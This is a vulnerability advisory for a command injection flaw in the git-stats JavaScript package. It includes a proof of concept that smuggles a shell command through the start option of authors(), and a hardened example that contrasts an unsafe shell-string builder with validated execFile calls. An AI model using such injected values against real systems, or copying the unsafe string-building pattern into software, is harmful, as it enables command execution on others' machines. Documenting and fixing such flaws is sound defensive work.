Code Injection in ionicabizau/git-stats


Reported on Aug 23rd 2020


git-stats is a JavaScript package for local git statistics, including GitHub-like contribution calendars.

Affected versions of this package are vulnerable to Command Injection. A caller who controls the options.start or options.end value passed to the authors() function can inject arbitrary commands by including a semicolon character in either value.

Proof of Concept

var GitStats = require("git-stats");
var g1 = new GitStats();

g1.authors({
    start: ' " ;touch HACKED; #//',
    end: 'endstring'
}, (resp, pieData) => {
    // callback body is not shown in the report
});
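
The weak pattern behind this class of bug, next to a hardened form, as an added example that is not git-stats source code and not part of the original report. The `git shortlog` command line, the helper names and the YYYY-MM-DD date format are assumptions; the report does not show the command git-stats actually builds.

```javascript
// Added example: hypothetical helpers, not code from git-stats.

// Assumption: start/end are calendar dates in YYYY-MM-DD form.
const ISO_DATE = /^\d{4}-\d{2}-\d{2}$/;

// Allowlist validation: anything that is not a plain date is rejected
// before it can reach a command line.
function parseDateOption(name, value) {
  if (typeof value !== "string" || !ISO_DATE.test(value)) {
    throw new TypeError(`${name} must be a YYYY-MM-DD date`);
  }
  // Round-trip through Date to reject impossible dates such as 2020-02-31.
  const d = new Date(`${value}T00:00:00Z`);
  if (Number.isNaN(d.getTime()) || d.toISOString().slice(0, 10) !== value) {
    throw new RangeError(`${name} is not a real calendar date`);
  }
  return value;
}

// Weak pattern, for contrast only: one string that a shell would parse, so a
// quote or semicolon inside start/end becomes shell syntax.
// The string is returned for inspection and never executed here.
function unsafeCommandString(options) {
  return `git shortlog -s -n --since="${options.start}" --until="${options.end}"`;
}

// Hardened pattern: validated values, one argv element per option.
function buildLogArgs(options) {
  const since = parseDateOption("start", options.start);
  const until = parseDateOption("end", options.end);
  return ["shortlog", "-s", "-n", `--since=${since}`, `--until=${until}`, "HEAD"];
}

// execFile starts git directly with an argv array; no shell interprets the
// option values, so validation and argv passing back each other up.
function authorsSafe(repoPath, options, callback) {
  const { execFile } = require("child_process");
  execFile("git", buildLogArgs(options), { cwd: repoPath }, callback);
}
```
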


Ionică Bizău (Johnny B.) gave praise a year ago
Thank you for this and sorry for the late reply.